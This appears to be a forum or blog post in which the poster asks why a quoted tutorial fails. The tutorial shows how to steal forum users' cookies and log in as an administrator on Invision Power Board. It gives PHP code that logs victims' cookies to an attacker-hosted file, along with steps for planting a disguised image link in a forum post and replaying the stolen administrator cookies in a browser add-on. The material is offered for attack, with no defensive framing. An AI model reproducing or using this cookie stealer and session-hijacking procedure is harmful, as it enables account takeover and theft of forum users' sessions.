Is the problem the part?
I used this:
(I didnt use a .gif file but a .html file)
| Smile Steal Forum Cookies With Gif How To Steal Cookies From A Forum With A Gif And Login With Admin Privileges Without Hash Cracking ! Use Firefox Because It's The Best Browser On The Web U Can Download The ADD N EDIT COOKIE HACK HERE: Code: https://addons.mozilla.org/firefox/573/ Tested On Invision Power Board 2.1.7 <- And This Xploit Works On Much Boards ! Ok Lets Start Now Here Is Some Files U Need... 1. ) -> Copy the below code,paste in notepad or ur fav text editor and save as cookiestealer.php (Note : Save it as cookiestealer.php not cookiestealer.php.txt) cookiestealer.php Code: $filename = "logfile.txt"; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, 'a')) { echo "."; exit; } else { if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE) { echo "."; exit; } } echo "."; fclose($handle); exit; } echo "."; exit; ?> 2. ) Make a new text file and name it logfile.txt and chmod it 777 . 3. ) The malicious file fun.gif (It will redirect user to cookie stealer) .. Copy the below code and save it as fun.gif Code: 4. ) And a real image miniature (to show to the victim) Ok now we have 4 files as listed below : 1. ) cookiestealer.php 2. ) logfile.txt 3. ) fun.gif 4. ) And a real image (any) lets start now .. Upload these files to your webspace example : fun.gif (ftp) -> www.yoursite.com/fun.gif cookiestealer.php (ftp) -> www.yoursite.com/cookiestealer.php logfile.txt (ftp) -> www.yoursite.com/logfile.txt ok now go on the victim forum .. Suppose victim forum is www.victim.com/forum/index.php Post a new topic or reply or we can insert the malicious gif in the signature ... or where we can .. but now i do a new topic with this bbcode : PHP Code:  with this bbcode the victim don't see the fun.gif but the real image miniature and when he click on it ,he has a redirect to the cookiestealer ... and we can see his cookies on : http://yoursite.com/logfile.txt when we have cookies we go to firefox and with the addon add n edit cookies i login with admin privileges... (first login with any user then edit cookies) Now reload the page and you will logged in like the administrator Enj0y. |
No comments:
Post a Comment